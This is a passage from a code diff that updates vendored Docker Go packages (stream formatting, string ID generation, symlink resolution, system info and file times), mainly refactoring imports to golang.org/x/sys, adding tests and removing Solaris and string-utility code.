*streamWriter) Write(buf []byte) (int, error) { + formattedBuf := sw.format(buf) + n, err := sw.Writer.Write(formattedBuf) + if n != len(formattedBuf) { + return n, io.ErrShortWrite + } + return len(buf), err +} + +func (sw *streamWriter) format(buf []byte) []byte { + msg := &jsonmessage.JSONMessage{Stream: sw.lineFormat(buf)} + b, err := json.Marshal(msg) + if err != nil { + return FormatError(err) + } + return appendNewline(b) +} + +// NewStdoutWriter returns a writer which formats the output as json message +// representing stdout lines +func NewStdoutWriter(out io.Writer) io.Writer { + return &streamWriter{Writer: out, lineFormat: func(buf []byte) string { + return string(buf) + }} +} + +// NewStderrWriter returns a writer which formats the output as json message +// representing stderr lines +func NewStderrWriter(out io.Writer) io.Writer { + return &streamWriter{Writer: out, lineFormat: func(buf []byte) string { + return "\033[91m" + string(buf) + "\033[0m" + }} +} diff --git a/vendor/github.com/docker/docker/pkg/streamformatter/streamwriter_test.go b/vendor/github.com/docker/docker/pkg/streamformatter/streamwriter_test.go new file mode 100644 index 0000000000..5b679f2cf4 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/streamformatter/streamwriter_test.go @@ -0,0 +1,35 @@ +package streamformatter // import "github.com/docker/docker/pkg/streamformatter" + +import ( + "bytes" + "testing" + + "gotest.tools/assert" + is "gotest.tools/assert/cmp" +) + +func TestStreamWriterStdout(t *testing.T) { + buffer := &bytes.Buffer{} + content := "content" + sw := NewStdoutWriter(buffer) + size, err := sw.Write([]byte(content)) + + assert.NilError(t, err) + assert.Check(t, is.Equal(len(content), size)) + + expected := `{"stream":"content"}` + streamNewline + assert.Check(t, is.Equal(expected, buffer.String())) +} + +func TestStreamWriterStderr(t *testing.T) { + buffer := &bytes.Buffer{} + content := "content" + sw := NewStderrWriter(buffer) + size, err := 
sw.Write([]byte(content)) + + assert.NilError(t, err) + assert.Check(t, is.Equal(len(content), size)) + + expected := `{"stream":"\u001b[91mcontent\u001b[0m"}` + streamNewline + assert.Check(t, is.Equal(expected, buffer.String())) +} diff --git a/vendor/github.com/docker/docker/pkg/stringid/stringid.go b/vendor/github.com/docker/docker/pkg/stringid/stringid.go index fa35d8bad5..fa7d9166eb 100644 --- a/vendor/github.com/docker/docker/pkg/stringid/stringid.go +++ b/vendor/github.com/docker/docker/pkg/stringid/stringid.go @@ -1,20 +1,26 @@ // Package stringid provides helper functions for dealing with string identifiers -package stringid +package stringid // import "github.com/docker/docker/pkg/stringid" import ( - "crypto/rand" + cryptorand "crypto/rand" "encoding/hex" + "fmt" "io" + "math" + "math/big" + "math/rand" "regexp" "strconv" "strings" - - "github.com/docker/docker/pkg/random" + "time" ) const shortLen = 12 -var validShortID = regexp.MustCompile("^[a-z0-9]{12}$") +var ( + validShortID = regexp.MustCompile("^[a-f0-9]{12}$") + validHex = regexp.MustCompile(`^[a-f0-9]{64}$`) +) // IsShortID determines if an arbitrary string *looks like* a short ID. func IsShortID(id string) bool { @@ -35,12 +41,8 @@ func TruncateID(id string) string { return id } -func generateID(crypto bool) string { +func generateID(r io.Reader) string { b := make([]byte, 32) - r := random.Reader - if crypto { - r = rand.Reader - } for { if _, err := io.ReadFull(r, b); err != nil { panic(err) // This shouldn't happen @@ -58,12 +60,40 @@ func generateID(crypto bool) string { // GenerateRandomID returns a unique id. func GenerateRandomID() string { - return generateID(true) + return generateID(cryptorand.Reader) } // GenerateNonCryptoID generates unique id without using cryptographically // secure sources of random. // It helps you to save entropy. 
func GenerateNonCryptoID() string { - return generateID(false) + return generateID(readerFunc(rand.Read)) +} + +// ValidateID checks whether an ID string is a valid image ID. +func ValidateID(id string) error { + if ok := validHex.MatchString(id); !ok { + return fmt.Errorf("image ID %q is invalid", id) + } + return nil +} + +func init() { + // safely set the seed globally so we generate random ids. Tries to use a + // crypto seed before falling back to time. + var seed int64 + if cryptoseed, err := cryptorand.Int(cryptorand.Reader, big.NewInt(math.MaxInt64)); err != nil { + // This should not happen, but worst-case fallback to time-based seed. + seed = time.Now().UnixNano() + } else { + seed = cryptoseed.Int64() + } + + rand.Seed(seed) +} + +type readerFunc func(p []byte) (int, error) + +func (fn readerFunc) Read(p []byte) (int, error) { + return fn(p) } diff --git a/vendor/github.com/docker/docker/pkg/stringid/stringid_test.go b/vendor/github.com/docker/docker/pkg/stringid/stringid_test.go index 8ff6b4383d..a7ccd5faae 100644 --- a/vendor/github.com/docker/docker/pkg/stringid/stringid_test.go +++ b/vendor/github.com/docker/docker/pkg/stringid/stringid_test.go @@ -1,4 +1,4 @@ -package stringid +package stringid // import "github.com/docker/docker/pkg/stringid" import ( "strings" diff --git a/vendor/github.com/docker/docker/pkg/stringutils/README.md b/vendor/github.com/docker/docker/pkg/stringutils/README.md deleted file mode 100644 index b3e454573c..0000000000 --- a/vendor/github.com/docker/docker/pkg/stringutils/README.md +++ /dev/null @@ -1 +0,0 @@ -This package provides helper functions for dealing with strings diff --git a/vendor/github.com/docker/docker/pkg/stringutils/stringutils.go b/vendor/github.com/docker/docker/pkg/stringutils/stringutils.go deleted file mode 100644 index 8e1c812d7a..0000000000 --- a/vendor/github.com/docker/docker/pkg/stringutils/stringutils.go +++ /dev/null @@ -1,101 +0,0 @@ -// Package stringutils provides helper functions for dealing 
with strings. -package stringutils - -import ( - "bytes" - "math/rand" - "strings" - - "github.com/docker/docker/pkg/random" -) - -// GenerateRandomAlphaOnlyString generates an alphabetical random string with length n. -func GenerateRandomAlphaOnlyString(n int) string { - // make a really long string - letters := []byte("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ") - b := make([]byte, n) - for i := range b { - b[i] = letters[random.Rand.Intn(len(letters))] - } - return string(b) -} - -// GenerateRandomASCIIString generates an ASCII random string with length n. -func GenerateRandomASCIIString(n int) string { - chars := "abcdefghijklmnopqrstuvwxyz" + - "ABCDEFGHIJKLMNOPQRSTUVWXYZ" + - "~!@#$%^&*()-_+={}[]\\|<,>.?/\"';:` " - res := make([]byte, n) - for i := 0; i < n; i++ { - res[i] = chars[rand.Intn(len(chars))] - } - return string(res) -} - -// Ellipsis truncates a string to fit within maxlen, and appends ellipsis (...). -// For maxlen of 3 and lower, no ellipsis is appended. -func Ellipsis(s string, maxlen int) string { - r := []rune(s) - if len(r) <= maxlen { - return s - } - if maxlen <= 3 { - return string(r[:maxlen]) - } - return string(r[:maxlen-3]) + "..." -} - -// Truncate truncates a string to maxlen. -func Truncate(s string, maxlen int) string { - r := []rune(s) - if len(r) <= maxlen { - return s - } - return string(r[:maxlen]) -} - -// InSlice tests whether a string is contained in a slice of strings or not. -// Comparison is case insensitive -func InSlice(slice []string, s string) bool { - for _, ss := range slice { - if strings.ToLower(s) == strings.ToLower(ss) { - return true - } - } - return false -} - -func quote(word string, buf *bytes.Buffer) { - // Bail out early for "simple" strings - if word != "" && !strings.ContainsAny(word, "\\'\"`${[|&;<>()~*?! 
\t\n") { - buf.WriteString(word) - return - } - - buf.WriteString("'") - - for i := 0; i < len(word); i++ { - b := word[i] - if b == '\'' { - // Replace literal ' with a close ', a \', and a open ' - buf.WriteString("'\\''") - } else { - buf.WriteByte(b) - } - } - - buf.WriteString("'") -} - -// ShellQuoteArguments takes a list of strings and escapes them so they will be -// handled right when passed as arguments to a program via a shell -func ShellQuoteArguments(args []string) string { - var buf bytes.Buffer - for i, arg := range args { - if i != 0 { - buf.WriteByte(' ') - } - quote(arg, &buf) - } - return buf.String() -} diff --git a/vendor/github.com/docker/docker/pkg/stringutils/stringutils_test.go b/vendor/github.com/docker/docker/pkg/stringutils/stringutils_test.go deleted file mode 100644 index 8af2bdcc0b..0000000000 --- a/vendor/github.com/docker/docker/pkg/stringutils/stringutils_test.go +++ /dev/null @@ -1,121 +0,0 @@ -package stringutils - -import "testing" - -func testLengthHelper(generator func(int) string, t *testing.T) { - expectedLength := 20 - s := generator(expectedLength) - if len(s) != expectedLength { - t.Fatalf("Length of %s was %d but expected length %d", s, len(s), expectedLength) - } -} - -func testUniquenessHelper(generator func(int) string, t *testing.T) { - repeats := 25 - set := make(map[string]struct{}, repeats) - for i := 0; i < repeats; i = i + 1 { - str := generator(64) - if len(str) != 64 { - t.Fatalf("Id returned is incorrect: %s", str) - } - if _, ok := set[str]; ok { - t.Fatalf("Random number is repeated") - } - set[str] = struct{}{} - } -} - -func isASCII(s string) bool { - for _, c := range s { - if c > 127 { - return false - } - } - return true -} - -func TestGenerateRandomAlphaOnlyStringLength(t *testing.T) { - testLengthHelper(GenerateRandomAlphaOnlyString, t) -} - -func TestGenerateRandomAlphaOnlyStringUniqueness(t *testing.T) { - testUniquenessHelper(GenerateRandomAlphaOnlyString, t) -} - -func 
TestGenerateRandomAsciiStringLength(t *testing.T) { - testLengthHelper(GenerateRandomASCIIString, t) -} - -func TestGenerateRandomAsciiStringUniqueness(t *testing.T) { - testUniquenessHelper(GenerateRandomASCIIString, t) -} - -func TestGenerateRandomAsciiStringIsAscii(t *testing.T) { - str := GenerateRandomASCIIString(64) - if !isASCII(str) { - t.Fatalf("%s contained non-ascii characters", str) - } -} - -func TestEllipsis(t *testing.T) { - str := "t🐳ststring" - newstr := Ellipsis(str, 3) - if newstr != "t🐳s" { - t.Fatalf("Expected t🐳s, got %s", newstr) - } - newstr = Ellipsis(str, 8) - if newstr != "t🐳sts..." { - t.Fatalf("Expected tests..., got %s", newstr) - } - newstr = Ellipsis(str, 20) - if newstr != "t🐳ststring" { - t.Fatalf("Expected t🐳ststring, got %s", newstr) - } -} - -func TestTruncate(t *testing.T) { - str := "t🐳ststring" - newstr := Truncate(str, 4) - if newstr != "t🐳st" { - t.Fatalf("Expected t🐳st, got %s", newstr) - } - newstr = Truncate(str, 20) - if newstr != "t🐳ststring" { - t.Fatalf("Expected t🐳ststring, got %s", newstr) - } -} - -func TestInSlice(t *testing.T) { - slice := []string{"t🐳st", "in", "slice"} - - test := InSlice(slice, "t🐳st") - if !test { - t.Fatalf("Expected string t🐳st to be in slice") - } - test = InSlice(slice, "SLICE") - if !test { - t.Fatalf("Expected string SLICE to be in slice") - } - test = InSlice(slice, "notinslice") - if test { - t.Fatalf("Expected string notinslice not to be in slice") - } -} - -func TestShellQuoteArgumentsEmpty(t *testing.T) { - actual := ShellQuoteArguments([]string{}) - expected := "" - if actual != expected { - t.Fatalf("Expected an empty string") - } -} - -func TestShellQuoteArguments(t *testing.T) { - simpleString := "simpleString" - complexString := "This is a 'more' complex $tring with some special char *" - actual := ShellQuoteArguments([]string{simpleString, complexString}) - expected := "simpleString 'This is a '\\''more'\\'' complex $tring with some special char *'" - if actual != expected { 
- t.Fatalf("Expected \"%v\", got \"%v\"", expected, actual) - } -} diff --git a/vendor/github.com/docker/docker/pkg/symlink/LICENSE.APACHE b/vendor/github.com/docker/docker/pkg/symlink/LICENSE.APACHE index 34c4ea7c50..b9fbf3c98f 100644 --- a/vendor/github.com/docker/docker/pkg/symlink/LICENSE.APACHE +++ b/vendor/github.com/docker/docker/pkg/symlink/LICENSE.APACHE @@ -176,7 +176,7 @@ END OF TERMS AND CONDITIONS - Copyright 2014-2016 Docker, Inc. + Copyright 2014-2017 Docker, Inc. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. diff --git a/vendor/github.com/docker/docker/pkg/symlink/LICENSE.BSD b/vendor/github.com/docker/docker/pkg/symlink/LICENSE.BSD index 9b4f4a294e..4c056c5ed2 100644 --- a/vendor/github.com/docker/docker/pkg/symlink/LICENSE.BSD +++ b/vendor/github.com/docker/docker/pkg/symlink/LICENSE.BSD @@ -1,4 +1,4 @@ -Copyright (c) 2014-2016 The Docker & Go Authors. All rights reserved. +Copyright (c) 2014-2017 The Docker & Go Authors. All rights reserved. Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are diff --git a/vendor/github.com/docker/docker/pkg/symlink/fs.go b/vendor/github.com/docker/docker/pkg/symlink/fs.go index f6bc2231f6..7b894cde73 100644 --- a/vendor/github.com/docker/docker/pkg/symlink/fs.go +++ b/vendor/github.com/docker/docker/pkg/symlink/fs.go @@ -4,7 +4,7 @@ // This code is a modified version of path/filepath/symlink.go from the Go standard library. 
-package symlink +package symlink // import "github.com/docker/docker/pkg/symlink" import ( "bytes" @@ -40,7 +40,7 @@ func FollowSymlinkInScope(path, root string) (string, error) { // // Example: // If /foo/bar -> /outside, -// FollowSymlinkInScope("/foo/bar", "/foo") == "/foo/outside" instead of "/oustide" +// FollowSymlinkInScope("/foo/bar", "/foo") == "/foo/outside" instead of "/outside" // // IMPORTANT: it is the caller's responsibility to call evalSymlinksInScope *after* relevant symlinks // are created and not to create subsequently, additional symlinks that could potentially make a diff --git a/vendor/github.com/docker/docker/pkg/symlink/fs_unix.go b/vendor/github.com/docker/docker/pkg/symlink/fs_unix.go index 22708273d6..c6dafcb0b9 100644 --- a/vendor/github.com/docker/docker/pkg/symlink/fs_unix.go +++ b/vendor/github.com/docker/docker/pkg/symlink/fs_unix.go @@ -1,6 +1,6 @@ // +build !windows -package symlink +package symlink // import "github.com/docker/docker/pkg/symlink" import ( "path/filepath" diff --git a/vendor/github.com/docker/docker/pkg/symlink/fs_unix_test.go b/vendor/github.com/docker/docker/pkg/symlink/fs_unix_test.go index 7085c0b666..9ed1dd70db 100644 --- a/vendor/github.com/docker/docker/pkg/symlink/fs_unix_test.go +++ b/vendor/github.com/docker/docker/pkg/symlink/fs_unix_test.go @@ -2,7 +2,7 @@ // Licensed under the Apache License, Version 2.0; See LICENSE.APACHE -package symlink +package symlink // import "github.com/docker/docker/pkg/symlink" import ( "fmt" diff --git a/vendor/github.com/docker/docker/pkg/symlink/fs_windows.go b/vendor/github.com/docker/docker/pkg/symlink/fs_windows.go index 241e531f9d..754761717b 100644 --- a/vendor/github.com/docker/docker/pkg/symlink/fs_windows.go +++ b/vendor/github.com/docker/docker/pkg/symlink/fs_windows.go @@ -1,4 +1,4 @@ -package symlink +package symlink // import "github.com/docker/docker/pkg/symlink" import ( "bytes" @@ -6,49 +6,49 @@ import ( "os" "path/filepath" "strings" - "syscall" 
"github.com/docker/docker/pkg/longpath" + "golang.org/x/sys/windows" ) func toShort(path string) (string, error) { - p, err := syscall.UTF16FromString(path) + p, err := windows.UTF16FromString(path) if err != nil { return "", err } b := p // GetShortPathName says we can reuse buffer - n, err := syscall.GetShortPathName(&p[0], &b[0], uint32(len(b))) + n, err := windows.GetShortPathName(&p[0], &b[0], uint32(len(b))) if err != nil { return "", err } if n > uint32(len(b)) { b = make([]uint16, n) - if _, err = syscall.GetShortPathName(&p[0], &b[0], uint32(len(b))); err != nil { + if _, err = windows.GetShortPathName(&p[0], &b[0], uint32(len(b))); err != nil { return "", err } } - return syscall.UTF16ToString(b), nil + return windows.UTF16ToString(b), nil } func toLong(path string) (string, error) { - p, err := syscall.UTF16FromString(path) + p, err := windows.UTF16FromString(path) if err != nil { return "", err } b := p // GetLongPathName says we can reuse buffer - n, err := syscall.GetLongPathName(&p[0], &b[0], uint32(len(b))) + n, err := windows.GetLongPathName(&p[0], &b[0], uint32(len(b))) if err != nil { return "", err } if n > uint32(len(b)) { b = make([]uint16, n) - n, err = syscall.GetLongPathName(&p[0], &b[0], uint32(len(b))) + n, err = windows.GetLongPathName(&p[0], &b[0], uint32(len(b))) if err != nil { return "", err } } b = b[:n] - return syscall.UTF16ToString(b), nil + return windows.UTF16ToString(b), nil } func evalSymlinks(path string) (string, error) { @@ -65,7 +65,7 @@ func evalSymlinks(path string) (string, error) { if err != nil { return "", err } - // syscall.GetLongPathName does not change the case of the drive letter, + // windows.GetLongPathName does not change the case of the drive letter, // but the result of EvalSymlinks must be unique, so we have // EvalSymlinks(`c:\a`) == EvalSymlinks(`C:\a`). // Make drive letter upper case. 
diff --git a/vendor/github.com/docker/docker/pkg/sysinfo/numcpu.go b/vendor/github.com/docker/docker/pkg/sysinfo/numcpu.go index aeb1a3a804..eea2d25bf9 100644 --- a/vendor/github.com/docker/docker/pkg/sysinfo/numcpu.go +++ b/vendor/github.com/docker/docker/pkg/sysinfo/numcpu.go @@ -1,6 +1,6 @@ // +build !linux,!windows -package sysinfo +package sysinfo // import "github.com/docker/docker/pkg/sysinfo" import ( "runtime" diff --git a/vendor/github.com/docker/docker/pkg/sysinfo/numcpu_linux.go b/vendor/github.com/docker/docker/pkg/sysinfo/numcpu_linux.go index 5eacd35121..5f6c6df8c4 100644 --- a/vendor/github.com/docker/docker/pkg/sysinfo/numcpu_linux.go +++ b/vendor/github.com/docker/docker/pkg/sysinfo/numcpu_linux.go @@ -1,11 +1,10 @@ -// +build linux - -package sysinfo +package sysinfo // import "github.com/docker/docker/pkg/sysinfo" import ( "runtime" - "syscall" "unsafe" + + "golang.org/x/sys/unix" ) // numCPU queries the system for the count of threads available @@ -15,10 +14,10 @@ import ( // Returns 0 on errors. Use |runtime.NumCPU| in that case. func numCPU() int { // Gets the affinity mask for a process: The very one invoking this function. 
- pid, _, _ := syscall.RawSyscall(syscall.SYS_GETPID, 0, 0, 0) + pid, _, _ := unix.RawSyscall(unix.SYS_GETPID, 0, 0, 0) var mask [1024 / 64]uintptr - _, _, err := syscall.RawSyscall(syscall.SYS_SCHED_GETAFFINITY, pid, uintptr(len(mask)*8), uintptr(unsafe.Pointer(&mask[0]))) + _, _, err := unix.RawSyscall(unix.SYS_SCHED_GETAFFINITY, pid, uintptr(len(mask)*8), uintptr(unsafe.Pointer(&mask[0]))) if err != 0 { return 0 } diff --git a/vendor/github.com/docker/docker/pkg/sysinfo/numcpu_windows.go b/vendor/github.com/docker/docker/pkg/sysinfo/numcpu_windows.go index 1d89dd5503..13523f671f 100644 --- a/vendor/github.com/docker/docker/pkg/sysinfo/numcpu_windows.go +++ b/vendor/github.com/docker/docker/pkg/sysinfo/numcpu_windows.go @@ -1,6 +1,4 @@ -// +build windows - -package sysinfo +package sysinfo // import "github.com/docker/docker/pkg/sysinfo" import ( "runtime" diff --git a/vendor/github.com/docker/docker/pkg/sysinfo/sysinfo.go b/vendor/github.com/docker/docker/pkg/sysinfo/sysinfo.go index f046de4b16..8fc0ecc25e 100644 --- a/vendor/github.com/docker/docker/pkg/sysinfo/sysinfo.go +++ b/vendor/github.com/docker/docker/pkg/sysinfo/sysinfo.go @@ -1,4 +1,4 @@ -package sysinfo +package sysinfo // import "github.com/docker/docker/pkg/sysinfo" import "github.com/docker/docker/pkg/parsers" diff --git a/vendor/github.com/docker/docker/pkg/sysinfo/sysinfo_linux.go b/vendor/github.com/docker/docker/pkg/sysinfo/sysinfo_linux.go index 7ad84a8309..dde5be19bc 100644 --- a/vendor/github.com/docker/docker/pkg/sysinfo/sysinfo_linux.go +++ b/vendor/github.com/docker/docker/pkg/sysinfo/sysinfo_linux.go @@ -1,4 +1,4 @@ -package sysinfo +package sysinfo // import "github.com/docker/docker/pkg/sysinfo" import ( "fmt" @@ -6,15 +6,10 @@ import ( "os" "path" "strings" - "syscall" - "github.com/Sirupsen/logrus" "github.com/opencontainers/runc/libcontainer/cgroups" -) - -const ( - // SeccompModeFilter refers to the syscall argument SECCOMP_MODE_FILTER. 
- SeccompModeFilter = uintptr(2) + "github.com/sirupsen/logrus" + "golang.org/x/sys/unix" ) func findCgroupMountpoints() (map[string]string, error) { @@ -60,9 +55,9 @@ func New(quiet bool) *SysInfo { } // Check if Seccomp is supported, via CONFIG_SECCOMP. - if _, _, err := syscall.RawSyscall(syscall.SYS_PRCTL, syscall.PR_GET_SECCOMP, 0, 0); err != syscall.EINVAL { + if err := unix.Prctl(unix.PR_GET_SECCOMP, 0, 0, 0, 0); err != unix.EINVAL { // Make sure the kernel has CONFIG_SECCOMP_FILTER. - if _, _, err := syscall.RawSyscall(syscall.SYS_PRCTL, syscall.PR_SET_SECCOMP, SeccompModeFilter, 0); err != syscall.EINVAL { + if err := unix.Prctl(unix.PR_SET_SECCOMP, unix.SECCOMP_MODE_FILTER, 0, 0, 0); err != unix.EINVAL { sysInfo.Seccomp = true } } diff --git a/vendor/github.com/docker/docker/pkg/sysinfo/sysinfo_linux_test.go b/vendor/github.com/docker/docker/pkg/sysinfo/sysinfo_linux_test.go index fae0fdffbb..13a07fbce9 100644 --- a/vendor/github.com/docker/docker/pkg/sysinfo/sysinfo_linux_test.go +++ b/vendor/github.com/docker/docker/pkg/sysinfo/sysinfo_linux_test.go @@ -1,4 +1,4 @@ -package sysinfo +package sysinfo // import "github.com/docker/docker/pkg/sysinfo" import ( "io/ioutil" @@ -6,29 +6,29 @@ import ( "path" "path/filepath" "testing" + + "golang.org/x/sys/unix" + "gotest.tools/assert" ) func TestReadProcBool(t *testing.T) { tmpDir, err := ioutil.TempDir("", "test-sysinfo-proc") - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) defer os.RemoveAll(tmpDir) procFile := filepath.Join(tmpDir, "read-proc-bool") - if err := ioutil.WriteFile(procFile, []byte("1"), 644); err != nil { - t.Fatal(err) - } + err = ioutil.WriteFile(procFile, []byte("1"), 0644) + assert.NilError(t, err) if !readProcBool(procFile) { t.Fatal("expected proc bool to be true, got false") } - if err := ioutil.WriteFile(procFile, []byte("0"), 644); err != nil { + if err := ioutil.WriteFile(procFile, []byte("0"), 0644); err != nil { t.Fatal(err) } if readProcBool(procFile) { - 
t.Fatal("expected proc bool to be false, got false") + t.Fatal("expected proc bool to be false, got true") } if readProcBool(path.Join(tmpDir, "no-exist")) { @@ -39,20 +39,66 @@ func TestReadProcBool(t *testing.T) { func TestCgroupEnabled(t *testing.T) { cgroupDir, err := ioutil.TempDir("", "cgroup-test") - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) defer os.RemoveAll(cgroupDir) if cgroupEnabled(cgroupDir, "test") { t.Fatal("cgroupEnabled should be false") } - if err := ioutil.WriteFile(path.Join(cgroupDir, "test"), []byte{}, 644); err != nil { - t.Fatal(err) - } + err = ioutil.WriteFile(path.Join(cgroupDir, "test"), []byte{}, 0644) + assert.NilError(t, err) if !cgroupEnabled(cgroupDir, "test") { t.Fatal("cgroupEnabled should be true") } } + +func TestNew(t *testing.T) { + sysInfo := New(false) + assert.Assert(t, sysInfo != nil) + checkSysInfo(t, sysInfo) + + sysInfo = New(true) + assert.Assert(t, sysInfo != nil) + checkSysInfo(t, sysInfo) +} + +func checkSysInfo(t *testing.T, sysInfo *SysInfo) { + // Check if Seccomp is supported, via CONFIG_SECCOMP.then sysInfo.Seccomp must be TRUE , else FALSE + if err := unix.Prctl(unix.PR_GET_SECCOMP, 0, 0, 0, 0); err != unix.EINVAL { + // Make sure the kernel has CONFIG_SECCOMP_FILTER. + if err := unix.Prctl(unix.PR_SET_SECCOMP, unix.SECCOMP_MODE_FILTER, 0, 0, 0); err != unix.EINVAL { + assert.Assert(t, sysInfo.Seccomp) + } + } else { + assert.Assert(t, !sysInfo.Seccomp) + } +} + +func TestNewAppArmorEnabled(t *testing.T) { + // Check if AppArmor is supported. then it must be TRUE , else FALSE + if _, err := os.Stat("/sys/kernel/security/apparmor"); err != nil { + t.Skip("App Armor Must be Enabled") + } + + sysInfo := New(true) + assert.Assert(t, sysInfo.AppArmor) +} + +func TestNewAppArmorDisabled(t *testing.T) { + // Check if AppArmor is supported. 
then it must be TRUE , else FALSE + if _, err := os.Stat("/sys/kernel/security/apparmor"); !os.IsNotExist(err) { + t.Skip("App Armor Must be Disabled") + } + + sysInfo := New(true) + assert.Assert(t, !sysInfo.AppArmor) +} + +func TestNumCPU(t *testing.T) { + cpuNumbers := NumCPU() + if cpuNumbers <= 0 { + t.Fatal("CPU returned must be greater than zero") + } +} diff --git a/vendor/github.com/docker/docker/pkg/sysinfo/sysinfo_solaris.go b/vendor/github.com/docker/docker/pkg/sysinfo/sysinfo_solaris.go deleted file mode 100644 index c858d57e08..0000000000 --- a/vendor/github.com/docker/docker/pkg/sysinfo/sysinfo_solaris.go +++ /dev/null @@ -1,121 +0,0 @@ -// +build solaris,cgo - -package sysinfo - -import ( - "bytes" - "os/exec" - "strconv" - "strings" -) - -/* -#cgo LDFLAGS: -llgrp -#include -#include -#include -int getLgrpCount() { - lgrp_cookie_t lgrpcookie = LGRP_COOKIE_NONE; - uint_t nlgrps; - - if ((lgrpcookie = lgrp_init(LGRP_VIEW_OS)) == LGRP_COOKIE_NONE) { - return -1; - } - nlgrps = lgrp_nlgrps(lgrpcookie); - return nlgrps; -} -*/ -import "C" - -// IsCPUSharesAvailable returns whether CPUShares setting is supported. -// We need FSS to be set as default scheduling class to support CPU Shares -func IsCPUSharesAvailable() bool { - cmd := exec.Command("/usr/sbin/dispadmin", "-d") - outBuf := new(bytes.Buffer) - errBuf := new(bytes.Buffer) - cmd.Stderr = errBuf - cmd.Stdout = outBuf - - if err := cmd.Run(); err != nil { - return false - } - return (strings.Contains(outBuf.String(), "FSS")) -} - -// New returns a new SysInfo, using the filesystem to detect which features -// the kernel supports. 
-//NOTE Solaris: If we change the below capabilities be sure -// to update verifyPlatformContainerSettings() in daemon_solaris.go -func New(quiet bool) *SysInfo { - sysInfo := &SysInfo{} - sysInfo.cgroupMemInfo = setCgroupMem(quiet) - sysInfo.cgroupCPUInfo = setCgroupCPU(quiet) - sysInfo.cgroupBlkioInfo = setCgroupBlkioInfo(quiet) - sysInfo.cgroupCpusetInfo = setCgroupCPUsetInfo(quiet) - - sysInfo.IPv4ForwardingDisabled = false - - sysInfo.AppArmor = false - - return sysInfo -} - -// setCgroupMem reads the memory information for Solaris. -func setCgroupMem(quiet bool) cgroupMemInfo { - - return cgroupMemInfo{ - MemoryLimit: true, - SwapLimit: true, - MemoryReservation: false, - OomKillDisable: false, - MemorySwappiness: false, - KernelMemory: false, - } -} - -// setCgroupCPU reads the cpu information for Solaris. -func setCgroupCPU(quiet bool) cgroupCPUInfo { - - return cgroupCPUInfo{ - CPUShares: true, - CPUCfsPeriod: false, - CPUCfsQuota: true, - CPURealtimePeriod: false, - CPURealtimeRuntime: false, - } -} - -// blkio switches are not supported in Solaris. -func setCgroupBlkioInfo(quiet bool) cgroupBlkioInfo { - - return cgroupBlkioInfo{ - BlkioWeight: false, - BlkioWeightDevice: false, - } -} - -// setCgroupCPUsetInfo reads the cpuset information for Solaris. 
-func setCgroupCPUsetInfo(quiet bool) cgroupCpusetInfo { - - return cgroupCpusetInfo{ - Cpuset: true, - Cpus: getCPUCount(), - Mems: getLgrpCount(), - } -} - -func getCPUCount() string { - ncpus := C.sysconf(C._SC_NPROCESSORS_ONLN) - if ncpus <= 0 { - return "" - } - return strconv.FormatInt(int64(ncpus), 16) -} - -func getLgrpCount() string { - nlgrps := C.getLgrpCount() - if nlgrps <= 0 { - return "" - } - return strconv.FormatInt(int64(nlgrps), 16) -} diff --git a/vendor/github.com/docker/docker/pkg/sysinfo/sysinfo_test.go b/vendor/github.com/docker/docker/pkg/sysinfo/sysinfo_test.go index b61fbcf541..6a118b63c8 100644 --- a/vendor/github.com/docker/docker/pkg/sysinfo/sysinfo_test.go +++ b/vendor/github.com/docker/docker/pkg/sysinfo/sysinfo_test.go @@ -1,4 +1,4 @@ -package sysinfo +package sysinfo // import "github.com/docker/docker/pkg/sysinfo" import "testing" diff --git a/vendor/github.com/docker/docker/pkg/sysinfo/sysinfo_unix.go b/vendor/github.com/docker/docker/pkg/sysinfo/sysinfo_unix.go index 45f3ef1c65..23cc695fb8 100644 --- a/vendor/github.com/docker/docker/pkg/sysinfo/sysinfo_unix.go +++ b/vendor/github.com/docker/docker/pkg/sysinfo/sysinfo_unix.go @@ -1,8 +1,8 @@ -// +build !linux,!solaris,!windows +// +build !linux,!windows -package sysinfo +package sysinfo // import "github.com/docker/docker/pkg/sysinfo" -// New returns an empty SysInfo for non linux nor solaris for now. +// New returns an empty SysInfo for non linux for now. 
func New(quiet bool) *SysInfo { sysInfo := &SysInfo{} return sysInfo diff --git a/vendor/github.com/docker/docker/pkg/sysinfo/sysinfo_windows.go b/vendor/github.com/docker/docker/pkg/sysinfo/sysinfo_windows.go index 4e6255bc59..5f68524e7e 100644 --- a/vendor/github.com/docker/docker/pkg/sysinfo/sysinfo_windows.go +++ b/vendor/github.com/docker/docker/pkg/sysinfo/sysinfo_windows.go @@ -1,6 +1,4 @@ -// +build windows - -package sysinfo +package sysinfo // import "github.com/docker/docker/pkg/sysinfo" // New returns an empty SysInfo for windows for now. func New(quiet bool) *SysInfo { diff --git a/vendor/github.com/docker/docker/pkg/system/chtimes.go b/vendor/github.com/docker/docker/pkg/system/chtimes.go index 7637f12e1a..c26a4e24b6 100644 --- a/vendor/github.com/docker/docker/pkg/system/chtimes.go +++ b/vendor/github.com/docker/docker/pkg/system/chtimes.go @@ -1,27 +1,10 @@ -package system +package system // import "github.com/docker/docker/pkg/system" import ( "os" - "syscall" "time" - "unsafe" ) -var ( - maxTime time.Time -) - -func init() { - if unsafe.Sizeof(syscall.Timespec{}.Nsec) == 8 { - // This is a 64 bit timespec - // os.Chtimes limits time to the following - maxTime = time.Unix(0, 1<<63-1) - } else { - // This is a 32 bit timespec - maxTime = time.Unix(1<<31-1, 0) - } -} - // Chtimes changes the access time and modified time of a file at the given path func Chtimes(name string, atime time.Time, mtime time.Time) error { unixMinTime := time.Unix(0, 0) @@ -44,9 +27,5 @@ func Chtimes(name string, atime time.Time, mtime time.Time) error { } // Take platform specific action for setting create time. 
